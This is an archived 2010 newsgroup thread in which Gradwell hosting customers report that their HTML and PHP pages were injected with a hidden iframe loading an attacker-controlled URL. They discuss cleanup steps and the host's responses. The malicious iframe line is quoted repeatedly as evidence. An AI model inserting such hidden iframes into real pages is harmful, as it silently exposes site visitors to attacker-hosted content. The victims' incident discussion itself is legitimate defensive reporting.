15.12.2010 - 07:53
Gradwell Sites Hacked?
frame from gaccess.dynsite.net/blog/wp-content/0wn3d
This code has been added to our files:
<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
style="display:none"></iframe>
Anyone else seeing this?
15.12.2010 - 08:23
On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
�Overnight our .html and .php pages have been modified to load in a
�frame from gaccess.dynsite.net/blog/wp-content/0wn3d
�
�This code has been added to our files:
�
�<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
�style="display:none"></iframe>
�
�Anyone else seeing this?
A week ago, Gradwell told me:
"We found that an outside source was able to breach a number of our
customers home spaces and install these .tmp files. The exploit in the
users homespace has been secured and we will be running daily seek and
destroy scripts, as well as securing our web servers. Tests will be
ongoing to investigate how this can be fully prevented in the future."
and then, in response to a further query from me:
"There have been no other exploits and we are currently running a daily
search and destroy script to identify any other possible breaches,
although we do not believe that there are."
Looks like their search and destroy script didn't find your case :-(
Check your root directory for spurious directories which may have
appeared there (at the same level as /webs/), and delete them. The
following directories, some with sub-directories, appeared in one of my
accounts (but not the other), all date-stamped 2nd December:
bin
db
doc
etc
include
inews
lib
log
man
spool
tmp
Also, and perhaps most importantly,check your list of FTP accounts for
any spurious account which may have appeared there, and delete it.
OK, it may be stable doors and horses, but it will clean up your account
from all the nasties which appeared in mine. (I was lucky that another
Gradwell customer alerted me, and the account could be cleaned up before
the perp actioned the hack.)
--
Molly Mockford
�Overnight our .html and .php pages have been modified to load in a
�frame from gaccess.dynsite.net/blog/wp-content/0wn3d
�
�This code has been added to our files:
�
�<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
�style="display:none"></iframe>
�
�Anyone else seeing this?
A week ago, Gradwell told me:
"We found that an outside source was able to breach a number of our
customers home spaces and install these .tmp files. The exploit in the
users homespace has been secured and we will be running daily seek and
destroy scripts, as well as securing our web servers. Tests will be
ongoing to investigate how this can be fully prevented in the future."
and then, in response to a further query from me:
"There have been no other exploits and we are currently running a daily
search and destroy script to identify any other possible breaches,
although we do not believe that there are."
Looks like their search and destroy script didn't find your case :-(
Check your root directory for spurious directories which may have
appeared there (at the same level as /webs/), and delete them. The
following directories, some with sub-directories, appeared in one of my
accounts (but not the other), all date-stamped 2nd December:
bin
db
doc
etc
include
inews
lib
log
man
spool
tmp
Also, and perhaps most importantly,check your list of FTP accounts for
any spurious account which may have appeared there, and delete it.
OK, it may be stable doors and horses, but it will clean up your account
from all the nasties which appeared in mine. (I was lucky that another
Gradwell customer alerted me, and the account could be cleaned up before
the perp actioned the hack.)
--
Molly Mockford
15.12.2010 - 08:40
I don't see any of those directories in my folders, or any spurious
ftp accounts. I've changed my ftp password just in case.
I just checked your site at pagination.co.uk and it has the same code
injected at the bottom of the page, so I wonder if this is more of a
Gradwell-wide problem rather that someone gaining access to my
account?
ftp accounts. I've changed my ftp password just in case.
I just checked your site at pagination.co.uk and it has the same code
injected at the bottom of the page, so I wonder if this is more of a
Gradwell-wide problem rather that someone gaining access to my
account?
15.12.2010 - 09:14
Molly Mockford wrote:
� On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
�
��Overnight our .html and .php pages have been modified to load in a
��frame from gaccess.dynsite.net/blog/wp-content/0wn3d
��
��This code has been added to our files:
��
��<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
��style="display:none"></iframe>
��
��Anyone else seeing this?
�
� A week ago, Gradwell told me:
�
� "We found that an outside source was able to breach a number of our
� customers home spaces and install these .tmp files. The exploit in the
� users homespace has been secured and we will be running daily seek and
� destroy scripts, as well as securing our web servers. Tests will be
� ongoing to investigate how this can be fully prevented in the future."
�
� and then, in response to a further query from me:
�
� "There have been no other exploits and we are currently running a daily
� search and destroy script to identify any other possible breaches,
� although we do not believe that there are."
�
� Looks like their search and destroy script didn't find your case :-(
�
It appears to have hit mine as well,based on a quick grep for 'iframe' :-(
Dave
� On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
�
��Overnight our .html and .php pages have been modified to load in a
��frame from gaccess.dynsite.net/blog/wp-content/0wn3d
��
��This code has been added to our files:
��
��<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
��style="display:none"></iframe>
��
��Anyone else seeing this?
�
� A week ago, Gradwell told me:
�
� "We found that an outside source was able to breach a number of our
� customers home spaces and install these .tmp files. The exploit in the
� users homespace has been secured and we will be running daily seek and
� destroy scripts, as well as securing our web servers. Tests will be
� ongoing to investigate how this can be fully prevented in the future."
�
� and then, in response to a further query from me:
�
� "There have been no other exploits and we are currently running a daily
� search and destroy script to identify any other possible breaches,
� although we do not believe that there are."
�
� Looks like their search and destroy script didn't find your case :-(
�
It appears to have hit mine as well,based on a quick grep for 'iframe' :-(
Dave
15.12.2010 - 09:54
On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
�I don't see any of those directories in my folders, or any spurious
�ftp accounts. I've changed my ftp password just in case.
�
�I just checked your site at pagination.co.uk and it has the same code
�injected at the bottom of the page, so I wonder if this is more of a
�Gradwell-wide problem rather that someone gaining access to my
�account?
You're right, and in others of my sites that I've checked. So much for
Gradwell's assurances of search-and-destroy!
--
Molly Mockford
�I don't see any of those directories in my folders, or any spurious
�ftp accounts. I've changed my ftp password just in case.
�
�I just checked your site at pagination.co.uk and it has the same code
�injected at the bottom of the page, so I wonder if this is more of a
�Gradwell-wide problem rather that someone gaining access to my
�account?
You're right, and in others of my sites that I've checked. So much for
Gradwell's assurances of search-and-destroy!
--
Molly Mockford
15.12.2010 - 10:01
On Wed, 15 Dec 2010, Molly Mockford <nospam@pagination.co.uk> wrote:
�On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
�
��I don't see any of those directories in my folders, or any spurious
��ftp accounts. I've changed my ftp password just in case.
��
��I just checked your site at pagination.co.uk and it has the same code
��injected at the bottom of the page, so I wonder if this is more of a
��Gradwell-wide problem rather that someone gaining access to my
��account?
�
�You're right, and in others of my sites that I've checked. So much for
�Gradwell's assurances of search-and-destroy!
These altered files (*.html and *.php) are datestamped 15th December, so
this may have been a separate attack from the 2nd December one. But the
iframe exploit is very reminiscent of the last time, when (as far as i
remember, and I am happy to be corrected if wrong) Gradwell shared a
list of customer logins with a trusted third party who proved
untrustworthy.
All my passwords were changed after that. And all my passwords remain
secure at my end; the security breach must have been in Gradwell.
--
Molly Mockford
�On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
�
��I don't see any of those directories in my folders, or any spurious
��ftp accounts. I've changed my ftp password just in case.
��
��I just checked your site at pagination.co.uk and it has the same code
��injected at the bottom of the page, so I wonder if this is more of a
��Gradwell-wide problem rather that someone gaining access to my
��account?
�
�You're right, and in others of my sites that I've checked. So much for
�Gradwell's assurances of search-and-destroy!
These altered files (*.html and *.php) are datestamped 15th December, so
this may have been a separate attack from the 2nd December one. But the
iframe exploit is very reminiscent of the last time, when (as far as i
remember, and I am happy to be corrected if wrong) Gradwell shared a
list of customer logins with a trusted third party who proved
untrustworthy.
All my passwords were changed after that. And all my passwords remain
secure at my end; the security breach must have been in Gradwell.
--
Molly Mockford
15.12.2010 - 10:27
Files of which I don't even have a local copy have been altered - e.g.
every Webalizer .html file, and every .php file in large database-driven
functions. It clearly needs to be cleaned up on-line; trying to upload
clean copies is totally impracticable. However, I am no Unix expert.
Can anybody come up with something which will run in the shell, and
check every .html and .php file for the string
<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
style="display:none"></iframe>
and delete it?
--
Molly Mockford
every Webalizer .html file, and every .php file in large database-driven
functions. It clearly needs to be cleaned up on-line; trying to upload
clean copies is totally impracticable. However, I am no Unix expert.
Can anybody come up with something which will run in the shell, and
check every .html and .php file for the string
<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
style="display:none"></iframe>
and delete it?
--
Molly Mockford
15.12.2010 - 10:56
On Wed, 15 Dec 2010 08:54:19 +0000, Molly Mockford
<nospam@pagination.co.uk> wrote:
��I just checked your site at pagination.co.uk and it has the same code
��injected at the bottom of the page, so I wonder if this is more of a
��Gradwell-wide problem rather that someone gaining access to my
��account?
�
�You're right, and in others of my sites that I've checked. So much for
�Gradwell's assurances of search-and-destroy!
Be careful. Gradwell shut all my sites down without warning when I
reported stuff like this and told me to clean all my scripts and
files.
I have no sites hosted on Gradwell now.
I feel sort of vindicated. :)
--
Geoff Berrow (Put thecat out to email)
It's only Usenet, no one dies.
My opinions, not the committee's, mine.
Simple RFDs www.4theweb.co.uk/rfdmaker
<nospam@pagination.co.uk> wrote:
��I just checked your site at pagination.co.uk and it has the same code
��injected at the bottom of the page, so I wonder if this is more of a
��Gradwell-wide problem rather that someone gaining access to my
��account?
�
�You're right, and in others of my sites that I've checked. So much for
�Gradwell's assurances of search-and-destroy!
Be careful. Gradwell shut all my sites down without warning when I
reported stuff like this and told me to clean all my scripts and
files.
I have no sites hosted on Gradwell now.
I feel sort of vindicated. :)
--
Geoff Berrow (Put thecat out to email)
It's only Usenet, no one dies.
My opinions, not the committee's, mine.
Simple RFDs www.4theweb.co.uk/rfdmaker
15.12.2010 - 11:02
I have now spoken to Gradwell support, who say that their second-line
support are working on this. I emphasised the importance of letting us
know via this newsgroup, and pointed out that only they can really run a
full-scale clean-up script - we can't be expected to clean up Webalizer
files!
My partner has suggested that this is part of a WikiLeaks revenge attack
on Paypal, Mastercard or whatever, such that each time a compromised
page is accessed it adds to the DOS attacks; if this is so, the most
urgent pages to clean are those most frequently accessed, but I stress
this is only guesswork!
--
Molly Mockford
support are working on this. I emphasised the importance of letting us
know via this newsgroup, and pointed out that only they can really run a
full-scale clean-up script - we can't be expected to clean up Webalizer
files!
My partner has suggested that this is part of a WikiLeaks revenge attack
on Paypal, Mastercard or whatever, such that each time a compromised
page is accessed it adds to the DOS attacks; if this is so, the most
urgent pages to clean are those most frequently accessed, but I stress
this is only guesswork!
--
Molly Mockford
15.12.2010 - 11:22
On 15/12/2010 08:14, Dave {Reply Address In.Sig} wrote:
��
� It appears to have hit mine as well,based on a quick grep for 'iframe' :-(
�
� Dave
�
Mine too. All edits timed at 00:50 this morning. I've restored them
all - I wonder if they will stay uninfected?
��
� It appears to have hit mine as well,based on a quick grep for 'iframe' :-(
�
� Dave
�
Mine too. All edits timed at 00:50 this morning. I've restored them
all - I wonder if they will stay uninfected?
15.12.2010 - 11:28
On Wed, 15 Dec 2010, Molly Mockford <nospam@pagination.co.uk> wrote
�But the iframe exploit is very reminiscent of the last time, when (as
�far as i remember, and I am happy to be corrected if wrong) Gradwell
�shared a list of customer logins with a trusted third party who proved
�untrustworthy.
It looks as though I may well have misremembered; looking back through
the old gradwell.support, I came across this link:
<http://blog.gradwell.net/2008/06/09/customer-ftp-and-website-security/>
(That time, though, it was only the top-level index file of each site
which was altered by the addition of the iframe exploit; now it's
throughout each site.)
--
Molly Mockford
�But the iframe exploit is very reminiscent of the last time, when (as
�far as i remember, and I am happy to be corrected if wrong) Gradwell
�shared a list of customer logins with a trusted third party who proved
�untrustworthy.
It looks as though I may well have misremembered; looking back through
the old gradwell.support, I came across this link:
<http://blog.gradwell.net/2008/06/09/customer-ftp-and-website-security/>
(That time, though, it was only the top-level index file of each site
which was altered by the addition of the iframe exploit; now it's
throughout each site.)
--
Molly Mockford
15.12.2010 - 11:40
On 15/12/10 08:14, Dave {Reply Address In.Sig} wrote:
� It appears to have hit mine as well,based on a quick grep for 'iframe' :-(
Dave, what is the grep command?
--
Tony van der Hoff | mailto:tony@vanderhoff.org
Buckinghamshire, England |
� It appears to have hit mine as well,based on a quick grep for 'iframe' :-(
Dave, what is the grep command?
--
Tony van der Hoff | mailto:tony@vanderhoff.org
Buckinghamshire, England |
15.12.2010 - 11:46
In message <ZiiyF0enzGCNFweb@molly.mockford>, Molly Mockford
<nospam@pagination.co.uk> wrote
[]
�Check your root directory for spurious directories which may have
�appeared there (at the same level as /webs/), and delete them.
Is this a different type of account from mine? I have two sites, and
both offer me HTDOCS and LOGS when I log in; I can't go rootwards, and
these directories contain only what I put there.
--
Andy Taylor [Editor, Austrian Philatelic Society].
Visit <URL:http://www.austrianphilately.com>
<nospam@pagination.co.uk> wrote
[]
�Check your root directory for spurious directories which may have
�appeared there (at the same level as /webs/), and delete them.
Is this a different type of account from mine? I have two sites, and
both offer me HTDOCS and LOGS when I log in; I can't go rootwards, and
these directories contain only what I put there.
--
Andy Taylor [Editor, Austrian Philatelic Society].
Visit <URL:http://www.austrianphilately.com>
15.12.2010 - 11:58
In article
<df0f793c-eeb0-4c7e-bf69-c133bcd339d2@g26g2000vbi.googlegroups.com>,
susan <susan0nz@yahoo.co.uk> writes:
�Overnight our .html and .php pages have been modified to load in a
�frame from gaccess.dynsite.net/blog/wp-content/0wn3d
�
�This code has been added to our files:
�
�<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
�style="display:none"></iframe>
�
�Anyone else seeing this?
My .html pages have also been modified, at 23:11 last night (the 14th).
Time to replace them with the copies on my own machine. Thanks for
flagging this up.
--
John Hall
"I look upon it, that he who does not mind his belly,
will hardly mind anything else."
Dr Samuel Johnson (1709-84)
<df0f793c-eeb0-4c7e-bf69-c133bcd339d2@g26g2000vbi.googlegroups.com>,
susan <susan0nz@yahoo.co.uk> writes:
�Overnight our .html and .php pages have been modified to load in a
�frame from gaccess.dynsite.net/blog/wp-content/0wn3d
�
�This code has been added to our files:
�
�<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
�style="display:none"></iframe>
�
�Anyone else seeing this?
My .html pages have also been modified, at 23:11 last night (the 14th).
Time to replace them with the copies on my own machine. Thanks for
flagging this up.
--
John Hall
"I look upon it, that he who does not mind his belly,
will hardly mind anything else."
Dr Samuel Johnson (1709-84)
15.12.2010 - 12:04
Hi
On Dec 15, 7:230am, Molly Mockford <nos...@pagination.co.uk> wrote:
� On Tue, 14 Dec 2010, susan <susan...@yahoo.co.uk> wrote:
� >Overnight our .html and .php pages have been modified to load in a
� >frame from gaccess.dynsite.net/blog/wp-content/0wn3d
�
� >This code has been added to our files:
�
� ><iframe srcD"http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
� >styleD"display:none"></iframe>
�
� >Anyone else seeing this?
Yes, a number of customer's sites are suffering from these problems.
� A week ago, Gradwell told me:
�
� "We found that an outside source was able to breach a number of our
� customers home spaces and install these .tmp files. The exploit in the
� users homespace has been secured and we will be running daily seek and
� destroy scripts, as well as securing our web servers. Tests will be
� ongoing to investigate how this can be fully prevented in the future."
That's right. We have taken some advice and made a number of changes,
but
there must be some sort of exploit in apache itself so we are also
looking at
that, and it's permissions model.
cheers
peter
On Dec 15, 7:230am, Molly Mockford <nos...@pagination.co.uk> wrote:
� On Tue, 14 Dec 2010, susan <susan...@yahoo.co.uk> wrote:
� >Overnight our .html and .php pages have been modified to load in a
� >frame from gaccess.dynsite.net/blog/wp-content/0wn3d
�
� >This code has been added to our files:
�
� ><iframe srcD"http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
� >styleD"display:none"></iframe>
�
� >Anyone else seeing this?
Yes, a number of customer's sites are suffering from these problems.
� A week ago, Gradwell told me:
�
� "We found that an outside source was able to breach a number of our
� customers home spaces and install these .tmp files. The exploit in the
� users homespace has been secured and we will be running daily seek and
� destroy scripts, as well as securing our web servers. Tests will be
� ongoing to investigate how this can be fully prevented in the future."
That's right. We have taken some advice and made a number of changes,
but
there must be some sort of exploit in apache itself so we are also
looking at
that, and it's permissions model.
cheers
peter
Ähnliche Themen
If some Linux vendor sites get hacked you can use this
14.07.2011 - 13:18 - Posts: 4
Anonymous Says It Hacked Chinese Government Sites
05.04.2012 - 20:15 - Posts: 0
Schestowitz.com gets hacked and 0wned. Becomes part of zombie bot-net to infect visitors and attack other sites.
23.02.2010 - 20:26 - Posts: 28
Latest case of corporate e-responsibility: 55,000 Windows sites hacked by a cocktail of Microsoft malware
25.08.2009 - 20:50 - Posts: 1
Someone's Yahoo email has been hacked and I'm getting "hacked" emails
04.02.2012 - 22:31 - Posts: 6
New Hacked stuffs available** Selling Dumps With Hacked Trac
10.08.2011 - 17:26 - Posts: 1
ability to watch television from internet; sites sites sites
08.06.2010 - 20:57 - Posts: 2
More
Search
